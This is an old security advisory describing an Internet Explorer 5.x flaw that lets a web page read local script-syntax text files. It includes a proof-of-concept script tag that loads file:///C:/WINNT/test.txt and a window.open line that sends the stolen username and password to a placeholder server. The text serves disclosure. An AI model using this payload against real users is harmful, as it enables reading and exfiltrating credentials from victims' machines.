Vulnerability

    Internet Explorer

Affected

    IE 5.x

Description

    Stefaan Deman  found following.   There is  a security  bug in the
    Internet  Explorer  5.   It  is  possible  to  read some textfiles
    (others than cookies)  from the client's  hard disk.   If there is
    for  example  in  the  directory  'C:\WINNT' a textfile 'test.txt'
    with content:

        us="stefaan"
        passwd="mypasswd"

    then it is possible to read this file in an HTML page with the tag

        <script src="file:///C:/WINNT/test.txt"></script>

    The  HTML  page  will  consider  the  file  as a script and us and
    passwd will be considered as variables in the previous example.

    It is then possible to use this information or send this (possible
    critical) information back to the webserver with for example

        <script>
         //alert(passwd)
         window.open("http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" +  escape(passwd), "blabla")
        </script>

    This is a security bug, it  should be impossible to read any  file
    on the client's  file system.   Of course the  file should have  a
    correct JavaScript or VBscript  syntax and the filename  should be
    known.  However, it  is easy to image  how this security hole  can
    be misused.

    This bug  isn't as  severe as  the one  posted by  Guninski.   The
    difference between this bug and  the one of Guninski is  that this
    security hole doesn't make use of Active X components.

    Victor A. Rodriguez tested it on MSIE 5.1b1 (3408) Preview Release
    for  Mac  and  its  vulnerable.   He  also tried Fizzilla (Moziila
    ported to Mac OS X) and it didn't work.

    IE 4.0 reports:

        Cannot open C:\WINNT\Profiles\<user>\Desktop\test.htm

Solution

    Nothing yet.